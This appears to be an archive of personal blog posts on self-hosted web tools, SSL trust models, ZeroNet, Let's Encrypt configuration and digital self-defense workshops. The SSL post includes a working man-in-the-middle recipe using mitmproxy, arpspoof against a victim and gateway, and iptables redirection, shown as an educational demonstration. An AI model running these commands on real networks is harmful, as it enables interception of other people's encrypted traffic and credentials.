When I browse the web, I like to take notes on what I read. It helps me find things again later. A few tools exist for this, but I really struggled to find one that did what I wanted, the way I wanted, namely:

save a text selection along with its context: time, website;
work on Firefox;
store my notes somewhere I control (it’s my data, after all!);
stay out of my way: I’m reading, not organising my notes;
automatically share the notes on a web page.

So I took some time to build my own note-taking tool, which I named “Webnotes”. It’s a Firefox extension that is fairly simple to configure, and that stores its data in a Kinto instance.

It’s as simple as selecting some text, right-clicking, choosing “save as webnote”, entering a tag, and you’re done!

My notes are available at notes.notmyidea.org, and here is the link to the sources, if you’re interested in seeing how it works!
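For readers curious about what storing a note in Kinto looks like, here is a minimal Python sketch that builds (without sending) the HTTP request for creating one record. The server URL, bucket, collection, field names and credentials are all hypothetical; the extension itself is written in JavaScript and may organise its data differently.

```python
import base64
import json
import urllib.request

# Hypothetical values: adapt the server, bucket and collection to your setup.
SERVER = "https://kinto.example.org/v1"
BUCKET = "webnotes"
COLLECTION = "notes"


def build_note_request(text: str, url: str, tag: str, user: str, password: str) -> urllib.request.Request:
    """Build (without sending) the POST request that would store one note."""
    # Kinto expects the record attributes under a top-level "data" key.
    body = json.dumps({"data": {"text": text, "url": url, "tag": tag}}).encode()
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return urllib.request.Request(
        f"{SERVER}/buckets/{BUCKET}/collections/{COLLECTION}/records",
        data=body,
        headers={"Content-Type": "application/json", "Authorization": f"Basic {token}"},
        method="POST",
    )


if __name__ == "__main__":
    request = build_note_request("A quote worth keeping", "https://example.org/article", "reading", "me", "secret")
    print(request.get_method(), request.full_url)
    print(request.data.decode())
```

Passing the request to urllib.request.urlopen would actually send it to the server.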

How do you generate your forms?

2016-05-31T00:00:00+02:00

TL;DR: I have just released the first version of a form generation service. Go and have a look at https://www.fourmilieres.net

In February 2012, I wrote here about a form generation service. A lot of water has flowed under the bridge since then, and we went through quite a few stages to finally arrive at a first version of this service (à la Google Forms).

As an organiser of events (small and large), I often find myself needing to create forms to collect information. Currently the best available solution is Google Forms, but it has several problems, starting with the fact that the code isn’t free software and that the data is stored at Google.

Most of the time the need is fairly simple: I want to specify a few questions and give my friends a link so they can answer them. I then come back later to see the list of answers.

Features

Quite a few technical solutions try to address the same problem, but most of them are rather complicated, require creating an account, and/or don’t give you a free hand over the generated data, or else have code that is hard to evolve or deploy.

So I wanted something simple to use, both for form creators and for end users. No frills, just a few views, and URLs to save once you’re done.

No account

You don’t need an account on the site to start using it. You simply create a new form, then send the link to your friends so that they can fill it in.

Keep control of your data

Once you have collected the answers to your questions, you can download the data to your machine as a .csv file.

API

All the data is in fact stored in Kinto, which is very easy to query over HTTP. This makes it very easy to reuse the forms you have built (or their answers) from other tools.

Self-hostable

One of the goals of this project is to give you back control of your data. Of course, you can use the instance made available at www.fourmilieres.net, but you can also host it yourself very simply, and you are strongly encouraged to do so! Our goal isn’t to store all the forms in the world, but to give control (back) to users!

Starting small…

This release is (of course) not perfect, and there is still a fair amount of work to do on this tool, but I think it’s an interesting foundation for a future where Google doesn’t have its hands on all our data.

The list of supported fields is rather short for now (short text, long text, yes/no, choice from a list), but it is meant to grow according to everyone’s needs.

I have also created a form so that you can send me your feedback, don’t hesitate!

So, er, how does it work?

The formbuilder, as I like to call it, is in the end made of two distinct parts:

Kinto, a service that stores data on the server side and exposes it through HTTP APIs
The formbuilder, a JavaScript application that only runs on the client side (in your browser), which lets you build forms and send the data to the server-side APIs.

As for the technical stack, the formbuilder is written in ReactJS. One of the interesting technical points of the project is that, in the end, it generates JSON Schema, a format for validating JSON data.

So, let’s recap! You arrive on the home page and click “Create a new form”, and you are presented with an interface where you can add form fields. Once that’s done, you press “Create the form”.

The JSON Schema is then sent to the Kinto server, which will use it to validate the data it receives afterwards.
This JSON Schema is also used when displaying the form to the people filling it in.
An access token is generated and added to the URL; it is the identifier of the form.
A second, administrator access token is generated; keep it aside to get access to the answers.
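To give an idea of what such a JSON Schema looks like and how it constrains the answers, here is a minimal Python sketch. The form, its field names and the tiny validate function are invented for the illustration; a real validator (and Kinto’s own validation) covers far more of the JSON Schema specification.

```python
# Hypothetical form with one short-text question and one yes/no question.
FORM_SCHEMA = {
    "type": "object",
    "title": "Picnic registration",
    "required": ["name"],
    "properties": {
        "name": {"type": "string", "title": "Your name"},
        "vegetarian": {"type": "boolean", "title": "Vegetarian?"},
    },
}

# Only the two JSON types used by the schema above are mapped.
PYTHON_TYPES = {"string": str, "boolean": bool}


def validate(answer: dict, schema: dict) -> list[str]:
    """Return a list of problems; an empty list means the answer is accepted.

    Only "required" and the types of known properties are checked.
    """
    errors = [f"missing field: {name}" for name in schema.get("required", []) if name not in answer]
    for name, value in answer.items():
        spec = schema["properties"].get(name)
        if spec is not None and not isinstance(value, PYTHON_TYPES[spec["type"]]):
            errors.append(f"wrong type for {name}: expected {spec['type']}")
    return errors


if __name__ == "__main__":
    print(validate({"name": "Ada", "vegetarian": True}, FORM_SCHEMA))
    print(validate({"vegetarian": "yes"}, FORM_SCHEMA))
```

The same schema can drive both the display of the form (titles, field types) and the server-side check of each answer, which is what makes it a convenient single source of truth.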

Anyway, I hope you find it useful! One small step towards giving data back to its users!

Do you trust SSL?

2016-03-25T00:00:00+01:00

As part of the digital self-defense workshops, I spent some time digging into how SSL is used, because contrary to what most people still tend to believe, the little padlock (which shows that an SSL connection is in progress) is absolutely not enough.

Here we go, with:

an overview of how SSL works
a few ways to get around this “protection”, with an attack carried out in practice
a tour of the currently existing solutions and why I do not find them really satisfying.

How does SSL work?

To explain the problems with SSL, I first need to explain how it all works.

SSL relies on certificates, which are issued by certificate authorities (which I call CAs in the rest of this article).

SSL certificates provide two things:

They guarantee that communications between browsers (you) and websites are known only to the holder of the site’s certificate and to you.
They guarantee that the site you are connecting to really is the one you think it is.

When visiting a site, the browser downloads the associated certificate and then checks that it was indeed issued by one of the CAs it trusts.
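
The same model is visible from a script. As a small illustration (not what a browser literally runs), Python’s standard ssl module builds a client context that requires a certificate chaining up to one of the CAs in the local trust store and matching the requested host name:

```python
import ssl

# Build a client-side context with Python's default settings: certificates must
# chain up to a trusted CA and match the requested host name.
context = ssl.create_default_context()

print("certificate required:", context.verify_mode == ssl.CERT_REQUIRED)
print("host name checked:", context.check_hostname)
# Number of CA certificates currently loaded; this may be 0 on systems where
# the trust store is a directory that is only read on demand.
print("trusted CAs loaded:", context.cert_store_stats()["x509_ca"])
```

Any one of the CAs in that store is enough to make a certificate acceptable, which is the weakness discussed in the rest of this article.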

Now imagine that one of the CAs tries to find out what is exchanged between my browser and my bank’s website (protected by SSL). How would that go?

Nothing prevents it from doing so: any CA can issue certificates for any site, and the browser, for its part, only checks that the certificate was issued by a CA it trusts.

None of this would be a problem if CAs were run reliably, but it is a complicated job, and some CAs have shown weaknesses in the past.

For example, DigiNotar (a Dutch CA) was compromised and the attackers were able to issue fraudulent SSL certificates, which allowed them to attack sites such as Facebook or GMail.

You can find a list of the risks and threats around CAs on the CACert wiki.

Man-in-the-middle attack on SSL

After hearing so often that it was very easy to do, I wanted to try spying on SSL-protected connections, and indeed it is downright scary how simple it is.

Within a few minutes, it is possible to carry out a man-in-the-middle attack, for example with a tool named mitmproxy.

To decrypt all of the SSL traffic, I simply had to run a few commands and have a CA that the victim’s browser trusts. I added mine to the target browser to simulate already having one (which is the case if one of the 1200 CAs gets hacked, and that seems to me a rather large attack surface).

I paste the commands here in case you are interested:

$ sudo aptitude install mitmproxy
$ mitmproxy -T --host

You have to make your victim believe that you are the gateway to the outside world, and make the gateway believe that you are the victim:

arpspoof -i wlan0 -t victim gateway
arpspoof -i wlan0 -t gateway victim

Then tell our fake gateway to redirect traffic on ports 80 and 443 to our proxy:

sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 4443
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 4443

And bam, we see everything that passes between the machine and the SSL server. One can even imagine running these few commands on a Raspberry Pi, to go even faster…

Key pinning in browsers

Currently, any CA can issue certificates for any site, and that is largely what causes the problem. One way to improve the situation is to pin the certificates of certain sites directly in browsers.

This approach has the merit of working very well for a small number of critical sites (Google, Facebook, etc.).

HTTP Public Key Pinning (HPKP)

HTTP Public Key Pinning is another pinning solution, one that establishes trust during the first connection to the site. This is called Trust on First Use, or TOFU.

The browser then stores this information in a cache and checks that the certificates match on subsequent visits.

HPKP has been available in Firefox since January 2015 and in Chrome since October 2015.
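
As a rough illustration of what gets pinned: an HPKP pin is the base64-encoded SHA-256 digest of the certificate’s public key information (SubjectPublicKeyInfo, DER-encoded), sent in a Public-Key-Pins header. The Python sketch below uses placeholder bytes instead of real keys, and the helper names are mine; extracting the real SubjectPublicKeyInfo from a certificate is left out.

```python
import base64
import hashlib


def pin_sha256(spki_der):
    """Return the pin for a DER-encoded SubjectPublicKeyInfo."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode("ascii")


def hpkp_header_value(pins, max_age):
    """Build the value of a Public-Key-Pins header from a list of pins."""
    parts = ['pin-sha256="%s"' % pin for pin in pins]
    parts.append("max-age=%d" % max_age)
    return "; ".join(parts)


def matches_cached_pins(spki_der, cached_pins):
    """What a browser does on later visits: compare the key with its cache."""
    return pin_sha256(spki_der) in cached_pins


# Placeholder bytes standing in for real public keys (assumption).
current_key = b"hypothetical SubjectPublicKeyInfo of the current key"
backup_key = b"hypothetical SubjectPublicKeyInfo of the backup key"
attacker_key = b"hypothetical SubjectPublicKeyInfo of a fraudulent certificate"

cached = [pin_sha256(current_key), pin_sha256(backup_key)]
print(hpkp_header_value(cached, max_age=5184000))
print(matches_cached_pins(current_key, cached))
print(matches_cached_pins(attacker_key, cached))
```

A certificate issued by another CA for the same site carries a different key, so it no longer matches the cached pins, whoever signed it.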

Certificate Transparency: auditable logs

Another approach is the one proposed by Certificate Transparency:

Certificate Transparency aims to remedy these certificate-based threats by making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users.

— Certificate Transparency

In other words, with this system CAs must make public the fact that they have signed new intermediate certificates. The signature is added to an append-only log.

Browsers then check that the certificates in use are indeed certificates that have been added to the log.

Here, all the intelligence lies in verifying these logs, which therefore make it possible to validate or invalidate root or intermediate certificates.
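
To give an idea of why such a log can be audited, here is a simplified Python sketch of the Merkle tree hash used by Certificate Transparency logs (leaf and node hashes with distinct prefixes, as described in RFC 6962). The entries are placeholder byte strings, and the audit and consistency proofs that real clients rely on are not shown.

```python
import hashlib


def leaf_hash(entry):
    # Leaves are hashed with a 0x00 prefix...
    return hashlib.sha256(b"\x00" + entry).digest()


def node_hash(left, right):
    # ...and inner nodes with a 0x01 prefix, so one cannot pass for the other.
    return hashlib.sha256(b"\x01" + left + right).digest()


def merkle_root(entries):
    """Compute the root hash of the tree built over a list of log entries."""
    count = len(entries)
    if count == 0:
        return hashlib.sha256(b"").digest()
    if count == 1:
        return leaf_hash(entries[0])
    # Split at the largest power of two strictly smaller than the entry count.
    split = 1
    while split * 2 < count:
        split *= 2
    return node_hash(merkle_root(entries[:split]), merkle_root(entries[split:]))


log = [b"certificate 1", b"certificate 2", b"certificate 3"]
root_before = merkle_root(log)
root_after = merkle_root(log + [b"certificate 4"])
print(root_before.hex())
print(root_after.hex())
```

Since the root depends on every entry, removing or rewriting a past entry changes it, which is what allows auditors to detect tampering with the log.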

It therefore seems to me that it would be possible to add a fraudulent certificate for the duration of an attack (it would be detected and removed afterwards).

Certificate Transparency is therefore not a solution against global eavesdropping set up by governments, for example.

If you read English well, I invite you to go and read this description of the problem and the solution, which I find very well written.

DANE + DNSSEC

The DANE working group has developed a framework for securely retrieving keying information from the DNS [RFC6698]. This framework allows secure storing and looking up server public key information in the DNS. This provides a binding between a domain name providing a particular service and the key that can be used to establish encrypted connection to that service.

— Dane WG

Another solution is called “DANE” and is built on top of the DNSSEC protocol.

I do not know DNSSEC very well, so I spent some time reading documents. My final impression is that the problem is exactly the same as with SSL: a certain number of people hold the keys, and all of the security relies on that trust. Yet these keys may be held by people who are not trustworthy.

Secure DNS (DNSSEC) uses cryptographic digital signatures signed with a trusted public key certificate to determine the authenticity of data. — https://en.wikipedia.org/wiki/DNS_spoofing

And also:

It is widely believed[1] that securing the DNS is critically important for securing the Internet as a whole, but deployment of DNSSEC specifically has been hampered (As of 22 January 2010) by several difficulties:

The need to design a backward-compatible standard that can scale to the size of the Internet

Prevention of “zone enumeration” (see below) where desired

Deployment of DNSSEC implementations across a wide variety of DNS servers and resolvers (clients)

Disagreement among implementers over who should own the top-level domain root keys

Overcoming the perceived complexity of DNSSEC and DNSSEC deployment

Blockchain-based solutions

One last avenue seems to be using the blockchain to distribute per-site keys.

The DNSChain solution first struck me as a good starting point, but reading a few critiques and some comments by the project’s developer changed my mind.

There remains the Namecoin Control avenue, which I have not dug into yet. Maybe in a future post. Any food for thought on these subjects is of course welcome!

Notes from a ZeroNet workshop

2016-03-17T00:00:00+01:00

Last Tuesday, a cryptoparty was held on the premises of INSA Rennes.

Since the event filled up beyond all expectations, I was invited to run a workshop there, and I proposed one on ZeroNet, a very nice little project that could become a new way of distributing the Web, one that notably makes it possible to avoid censorship.

Before anything else, many thanks to the INSA library team for organising this event, which has real political significance.

A bit of history

I believe Tim Berners-Lee (the inventor of the Web) had envisioned the Web as a decentralised protocol. Everyone would host their own data and serve it to others, who could then access it.

With this model, it is impossible to access a site if its author is not online. No matter: we started having machines that stay connected to the network 24 hours a day. And then, since one machine was no longer enough, we got farms of machines in data centers, and so on, in order to handle the thousands of users of those sites.

A decentralised Web

ZeroNet addresses this problem (among others) by offering an alternative, peer-to-peer way of distributing the Web. When you visit a site:

You contact a BitTorrent tracker to get the list of the site’s other visitors (the peers).
You ask the peers to give you the site’s files.
You check that the files served are the right ones (by verifying the attached signature).

Any visitor then becomes a peer, serving the site to other visitors.
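
The last step of the visit can be sketched as follows in Python. This is a simplified model, not ZeroNet’s actual file format: it assumes a manifest listing the size and SHA-256 digest of each file, and it assumes the signature of that manifest has already been checked against the site’s key.

```python
import hashlib


def build_manifest(files):
    """Site owner side: describe each file by its size and digest."""
    return {
        path: {"size": len(content), "sha256": hashlib.sha256(content).hexdigest()}
        for path, content in files.items()
    }


def verify_file(manifest, path, content):
    """Visitor side: accept a file received from a peer only if it matches."""
    expected = manifest.get(path)
    if expected is None:
        return False  # the file is not part of the site
    if len(content) != expected["size"]:
        return False
    return hashlib.sha256(content).hexdigest() == expected["sha256"]


site = {"index.html": b"<h1>Hello ZeroNet</h1>", "style.css": b"h1 { color: teal; }"}
manifest = build_manifest(site)

print(verify_file(manifest, "index.html", site["index.html"]))
print(verify_file(manifest, "index.html", b"<h1>Tampered by a peer</h1>"))
```

Because any peer can serve any file, this check is what lets a visitor accept content from strangers: a peer that alters a file produces a digest that no longer matches the signed manifest.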

Among the many advantages of this approach, I particularly note that:

It is very hard to censor a site: it lives on the machines of all its visitors.
Fingerprinting attacks are impossible: the Web browser connects to a local proxy server.
You hold your data directly and (by design) do not hand it over to silos (Facebook, Google, etc.).

If you are interested in a quick demonstration, I recorded a 10-minute video in which I speak English with a very deep voice.

Workshop

For the workshop, I chose to give a quick presentation of the project (I translated the English slides for the occasion; the sources are available) before installing ZeroNet on the machines and using it to publish a site.

Sharing on the local network

We ran into trouble because of the (somewhat congested) network, on which the ports used for peer-to-peer communication were closed. It is of course possible to run the whole thing independently from the rest of the network, but I had not planned for that.

So here is how to work around the problem:

Install and run a BitTorrent tracker (surprisingly, nothing is packaged for Debian at the moment). I chose to install OpenTracker.
Then launch ZeroNet with specific options (the first command is for the machine hosting the tracker, the second for another node on the network).

$ python zeronet.py --trackers udp://localhost:6969 --ip_external 192.168.43.207
$ python zeronet.py --trackers udp://192.168.43.207:6969 --ip_external 192.168.43.172

You need to specify the external IP address that each node exposes, to prevent the node from trying to discover it by itself: we want the local network address, not the Internet address.

Next time I will try to come with a Wi-Fi hotspot and a BitTorrent tracker in my pocket!

Questions and answers

There were a few interesting questions that I could not always answer on the spot. After some research, I am adding details here.

Torrent + Tor = security hole?

I thought I had heard about de-anonymisation problems when using BitTorrent over Tor.

In some cases, certain torrent clients (uTorrent, BitSpirit, etc.) write your IP address directly into the information sent to the tracker and/or to the other peers. (source: https://blog.torproject.org/blog/bittorrent-over-tor-isnt-good-idea)

This is not the case with ZeroNet, which takes care of the problem.

ZeroMail is slow, isn’t it?

One of the demo applications, ZeroMail, offers a mechanism for sending encrypted messages over a peer-to-peer network. The chosen approach is to encrypt each message with the recipient’s key and put it in a common pot. Everyone tries to decrypt every message, but can only decrypt their own.

This avoids leaking metadata, unlike PGP.

I do not actually have a clear answer to this question: the author of ZeroNet told me that 10MB (the default size limit of a site) is a lot of room for storing messages, and that it is possible to delete old messages once they have been read, for example.

Another solution I had in mind was to create a ZeroSite for each recipient, but then the number of messages a user receives becomes known.

I see several problems with the current design of ZeroMail (a denial of service seems fairly easy to mount against it, for example). To be investigated.

How do you host very large sites?

For example, how would you host Wikipedia?

It seems that the best way would be to split Wikipedia into a lot of small resources (by category, for example). Large media files could be considered optional (and therefore downloaded only on demand).

Do we really need a tracker?

DHT support is wanted but not implemented yet. Using the BitTorrent DHT is not an option, since Tor does not support UDP.

Service de nuages: guaranteeing data integrity with signatures

2016-03-01T00:00:00+01:00

This article is reposted from “Service de Nuages”, the blog of my team at Mozilla.

As part of the Go Faster project, we want to ship updates to parts of Firefox separately from the major updates (which happen every 6 weeks).

The data we want to update on clients is varied. Among other things, we want to handle updates to the revocation lists (CRLs) of SSL certificates.

It is obviously necessary to make sure that the data downloaded to clients is legitimate: that nobody is trying to invalidate certificates that are actually valid, and that all of the updates are indeed retrieved on the client.

The signature guarantees that an update contains all the records, but it is still possible to block access to the service (for example with the Great Firewall of China).

This mechanism works for certificate revocation lists, but not only for them. We plan to reuse it in the future to update other parts of Firefox, and you can also take advantage of it for other use cases.

We want to use Kinto to distribute these datasets. One advantage is that the collections can easily be cached behind a CDN.

However, we do not want clients to blindly trust either the Kinto server or the CDN.

Indeed, an attacker controlling one or the other could send whatever updates they want to all clients, or remove revoked certificates. Imagine the carnage!

To solve this problem, consider the following conditions:

The person who has the power to update the CRLs (the updater) has access to a signing key (or better, an HSM) that lets them sign the collection;
The public counterpart of this key is stored and distributed in Firefox;
Hashing and signing are done on the client side to avoid certain attack vectors (for example if an attacker has control of the Kinto server).

Hashing, sometimes loosely called one-way encryption, always produces the same result from the same input, and cannot practically be reversed.

First upload of data to Kinto

All of the data is retrieved from a secure source and then put into a JSON collection. Each item contains a unique identifier generated on the client.

For example, a record may look like this:

{"id": "b7dded96-8df0-8af8-449a-8bc47f71b4c4",
 "fingerprint": "11:D5:D2:0A:9A:F8:D9:FC:23:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3"}

The hash of the collection is then computed, signed, and sent to the server (see below for details).

Signing is delegated to a service that does nothing else, since the security of the certificate used for signatures is extremely important.

How to verify data integrity?

First, retrieve all the records present on the server, along with the hash and its associated signature.

Next, verify the signature of the hash, to make sure it really comes from a trusted third party.

Finally, recompute the hash locally and check that it matches the one that was signed.
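
These three steps can be sketched in Python as below. Important assumption: the standard library has no asymmetric signatures, so an HMAC with a shared key stands in for the real signature scheme here; in the setup described above, the signature would be verified with the public key shipped in Firefox. The function names and the key are hypothetical.

```python
import hashlib
import hmac
import json


def collection_hash(records):
    """Hash the records in a canonical order (sorted by id, sorted keys)."""
    ordered = sorted(records, key=lambda record: record["id"])
    serialized = json.dumps(ordered, sort_keys=True).encode("utf-8")
    return hashlib.sha256(serialized).hexdigest()


def sign(hash_hex, key):
    # Stand-in for an asymmetric signature (assumption, see above).
    return hmac.new(key, hash_hex.encode("ascii"), hashlib.sha256).hexdigest()


def verify_collection(records, published_hash, signature, key):
    # Step 2: the published hash must carry a valid signature.
    if not hmac.compare_digest(sign(published_hash, key), signature):
        return False
    # Step 3: the hash recomputed locally must match the signed one.
    return hmac.compare_digest(collection_hash(records), published_hash)


key = b"hypothetical signing key"
records = [
    {"id": "b7dded96-8df0-8af8-449a-8bc47f71b4c4",
     "fingerprint": "11:D5:D2:0A:9A:F8:D9:FC:23:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3"},
]
published_hash = collection_hash(records)
signature = sign(published_hash, key)

# Step 1 (fetching records, hash and signature from the server) is simulated
# by the variables above.
print(verify_collection(records, published_hash, signature, key))
print(verify_collection([], published_hash, signature, key))
```

The second call simulates a server or CDN that silently drops a revoked certificate: the signature is still valid, but the recomputed hash no longer matches.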

Adding new data

To add new data, you must make sure that the data you hold locally is valid before doing anything else.

Once this data has been validated, simply proceed as you did the first time, and send the hash of the collection to the server again.

How to compute this hash?

To compute the hash of the collection, you need to:

Order all the items of the collection (by their id);
For each item, serialize the fields we are interested in (concatenating key + value);
Compute the hash from the serialization.

We are still unsure about how the hash will be computed. JSON Web Signatures look like an interesting lead. In the meantime, a naive implementation in Python could look like this:

import json
import hashlib

data = [
   {"id": "b7dded96-8df0-8af8-449a-8bc47f71b4c4",
    "fingerprint": "11:D5:D2:0A:9A:F8:D9:FC:23:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3"},
   {"id": "dded96b7-8f0d-8f8a-49a4-7f771b4c4bc4",
    "fingerprint": "33:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3:11:D5:D2:0A:9A:F8:D9:FC"}]

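# Order the records by id so that the hash does not depend on the order in
# which the records are listed.
ordered = sorted(data, key=lambda record: record["id"])

m = hashlib.sha256()
# hashlib works on bytes, so the JSON string has to be encoded first.
m.update(json.dumps(ordered, sort_keys=True).encode("utf-8"))
collection_hash = m.hexdigest()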

Let’s Encrypt + HAProxy

2016-02-11T00:00:00+01:00

Note: this article is out of date. It is now (2018) possible to install Let’s Encrypt SSL certificates in a much simpler way, using certbot (and its nginx plugin, certbot --nginx).

It’s time for the Web to take a big step forward in terms of security and privacy. We want to see HTTPS become the default. Let’s Encrypt was built to enable that by making it as easy as possible to get and manage certificates.

— Let’s Encrypt

Since early December, the new certificate authority Let’s Encrypt has been in beta. SSL certificates are a way to 1. encrypt the communication between your browser and the server, and 2. make sure that the website you are accessing is the one you think you are connecting to (to avoid man-in-the-middle attacks).

Until now, you had to pay a company to get certificates that do not trigger security warnings in browsers.

Now, thanks to Let’s Encrypt, it is possible to get free SSL certificates, which is a big step forward for the security of our communications.

I have just set up a (fairly simple) process that configures your server to generate valid SSL certificates with Let’s Encrypt and the HAProxy load balancer.

For this article I relied on other articles, which I recommend reading for further information.

Domain validation by Let’s Encrypt

I will skip the installation details of the Let’s Encrypt client, which are very well explained in their documentation.

Once it is installed, you will type a command that looks like this:

letsencrypt-auto certonly --renew-by-default \
    --webroot -w /home/www/letsencrypt-requests/ \
    -d hurl.kinto-storage.org \
    -d forums.kinto-storage.org

The webroot is the place where the proofs of domain ownership will be dropped.

When the Let’s Encrypt servers want to check that you really are behind the certificate requests, they send an HTTP request to http://domaine.org/.well-known/acme-challenge, where they expect to find information generated by the letsencrypt-auto command.

I chose to write a rule in HAProxy that routes all requests whose path starts with /.well-known/acme-challenge to an nginx backend serving static files (those contained in /home/www/letsencrypt-requests/).

Here is the relevant section of the HAProxy configuration (and the complete configuration, in case it is useful):

frontend http
    bind 0.0.0.0:80
    mode http
    default_backend nginx_server

    acl letsencrypt_check path_beg /.well-known/acme-challenge
    use_backend letsencrypt_backend if letsencrypt_check

    redirect scheme https code 301 if !{ ssl_fc } !letsencrypt_check

backend letsencrypt_backend
    http-request set-header Host letsencrypt.requests
    dispatch 127.0.0.1:8000

And the NGINX one:

server {
    listen 8000;
    server_name letsencrypt.requests;
    root /home/www/letsencrypt-requests;
}

Installing the certificates in HAProxy

Your SSL certificates should be generated in /etc/letsencrypt/live, but they are not in the format HAProxy expects. No big deal: the following command, to be run for each domain, concatenates the private key and the full certificate chain into a single file that HAProxy can read:

cat /etc/letsencrypt/live/domaine.org/privkey.pem /etc/letsencrypt/live/domaine.org/fullchain.pem > /etc/ssl/letsencrypt/domaine.org.pem

And then, in the HAProxy configuration, for the (new) https frontend:

bind 0.0.0.0:443 ssl no-sslv3 crt /etc/ssl/letsencrypt

Make sure you have an https frontend for all of your HTTPS sites. For me it looks like this.

Once all of this is done, restart your haproxy service and off you go!

Automation

To automate all of this a bit, I chose to do it as follows:

A domain file in letsencrypt/domains/domain.org that contains the letsencrypt script.
A certificate installation file in letsencrypt/install-certs.sh that takes care of installing the already generated certificates.
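
For illustration, the installation step could look like the Python sketch below. It is not the content of install-certs.sh (which is a shell script); the build_haproxy_bundles function is a hypothetical equivalent that applies the concatenation shown earlier to every domain found in the live directory.

```python
from pathlib import Path


def build_haproxy_bundles(live_dir, output_dir):
    """Write one <domain>.pem file (private key + full chain) per domain."""
    live_dir = Path(live_dir)
    output_dir = Path(output_dir)
    output_dir.mkdir(parents=True, exist_ok=True)
    written = []
    for domain_dir in sorted(p for p in live_dir.iterdir() if p.is_dir()):
        key = domain_dir / "privkey.pem"
        chain = domain_dir / "fullchain.pem"
        if not (key.exists() and chain.exists()):
            continue  # certificate not generated (yet) for this domain
        bundle = output_dir / (domain_dir.name + ".pem")
        # Same order as the cat command: private key first, then the chain.
        bundle.write_bytes(key.read_bytes() + chain.read_bytes())
        bundle.chmod(0o600)  # the bundle contains the private key
        written.append(bundle)
    return written


# Typical call, to be run as root before reloading HAProxy:
# build_haproxy_bundles("/etc/letsencrypt/live", "/etc/ssl/letsencrypt")
```

Pointing the crt option of the bind line at the output directory, as above, lets HAProxy pick up every bundle it contains.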

And there you go! Everything is in a GitHub repository; if it can be of use to you, so much the better!

Digital self-defense workshops

2016-01-14T00:00:00+01:00

Eight months ago, I realised how much the choice of tools matters when facing mass surveillance, notably when it comes to data encryption. One of the things I wanted to do back then was to run workshops.

So I intend to:

Organise awareness workshops about communication tools for the people close to me;

Use encrypted communication as often as possible, at least to make decrypting the messages take longer, to “muddy the waters”.

— Chiffrement

It took me a little while to get started, but I am finally coming out of the first workshop, which I co-led with geb, for an audience of journalists.

For this first edition, the idea was at once to meet an audience I do not know well, to give them tools to solve the problems they sometimes face, and to get a sense of what a digital self-defense workshop could be.

The goals for this first workshop were to:

Discuss needs and bring out stories where the lack of tools or knowledge caused problems in concrete situations;
Become aware of “risky behaviours”, and scare the trainees so that they realise the current state of affairs;
Offer concrete solutions to the problems raised, along with the minimum of theoretical knowledge needed to grasp them.

1. Bringing out the problems

To bring out the problems, we chose to form small discussion groups, in order to run “Mutual Interview Groups” (“Groupes d’Interview Mutuels”, or “GIM”):

the facilitator invites participants to gather in groups of three, with people they know less well, then invites each person to share a lived experience related to the theme of the meeting, and the other two to ask questions that help them fully grasp what was experienced.

— «Pour s’écouter», SCOP Le Pavé.

From these GIMs we were able to bring out a few stories, revolving around:

Protecting (information) sources: how can you help someone “leak” data from inside a company?
Encrypting your data: how can you avoid “leaking” important data when equipment is seized?

2. Scaring people

One of the first goals is to scare people, so that everyone realises how easy it is to access certain data. Grégoire had suggested a few little hooks which, I must say, worked well:

I asked those present to:

say their password out loud in front of the others: in principle nobody will do it;
come and log in to their email account from my computer. I caught one person, who came over to type their password.

This was a good way to talk about the importance of the traces you can leave on a computer, and about the trust you need to have in the hardware you use, all the more so if it is not yours.

To keep scaring them, after a brief explanation of what SSL is, we showed how easy it is to sniff the network looking for passwords sent in the clear.

3. Offering concrete solutions

Once everyone had fully become aware of the issues and no longer dared to use their computer or phone, we started talking about a few solutions. Several approaches were possible here; we chose to present a few tools that seemed to meet expectations:

We explained what Tails is, and how to use it and duplicate it.
We took a tour of the tools available on Tails, notably around file anonymisation and the effective deletion of content.
Some people were able to create a Tails key with persistence configured.
We connected to the Tor network and checked that our IP addresses did change on demand.
We used CryptoCat over Tor, to see how to have a confidential conversation in which files can be exchanged.

Feedback

Overall, for a three-and-a-half-hour training session, I am fairly happy with the exercise and with all the topics we managed to cover. There is a lot of room for improvement, notably in the preparation (for example, I forgot to bring enough USB keys to use Tails).

Most of the feedback we have received so far is positive, and there is a desire to go further on all of these topics.

What’s next

There are many topics that we did not cover, or only skimmed, for lack of time. Ideally, at least a full day would be needed to cover a few topics in more detail (one can imagine a theory part in the morning and a practical part in the afternoon, for example).

I deliberately chose not to cover message encryption with PGP, because I think the protection it offers is not sufficient, but I am reconsidering my decision: it could be useful to at least present the tool while stressing some of its weaknesses.

A Twitter account was recently created around the crypto-parties in Rennes; if you are interested, go and have a look!

I did not find any available resources on training plans for this subject, so I decided to publish ours, in order to build training plans together with others.

They are currently available on Read The Docs. All feedback is of course welcome!

Should email die?

2015-11-24T00:00:00+01:00

I use the email protocol every day, for better or worse, knowing full well that for most of my conversations all of my messages travel in the clear over the network, since too few people use message encryption.

And even if I manage to convince some of the people close to me to install PGP, I am not satisfied with the result: the metadata (who contacts whom, when, and to say what) still travels in the clear, for all to see.

This problem is directly tied to the email protocol: some of this metadata (at least the recipient) has to leak for the mail protocol to work.

Email meets a need for asynchronous communication, which allows for more thoughtful conversations than a simple chat. It is entirely possible to use some existing technologies to build the future of email, in which:

Metadata would be encrypted: it would not be possible to know who communicates with whom, and when;
Encryption would be strong (and protected by a passphrase?);
The leak of an encryption key used in one exchange would not make it possible to decrypt all the exchanges (forward secrecy);
It would not be possible to reuse the data as evidence to incriminate the sender of the message (deniability).

With at least these needs in mind, a review of the existing projects seems to point towards Pond, or towards Signal.

Unfortunately, Pond is the project of a single person, who rather wants to use this code as a demonstration of the concept.

Web distribution signing

2015-10-12T00:00:00+02:00

I’m not a crypto expert, nor do I pretend to be one. These are thoughts I want to share with the crypto community to see whether a solution exists to this particular problem.

One often-cited flaw in web-based cryptographic applications is that there is no way to trust online software distributions. Put differently, you don’t actually trust the software authors; you trust the software distributors and certificate authorities (CAs).

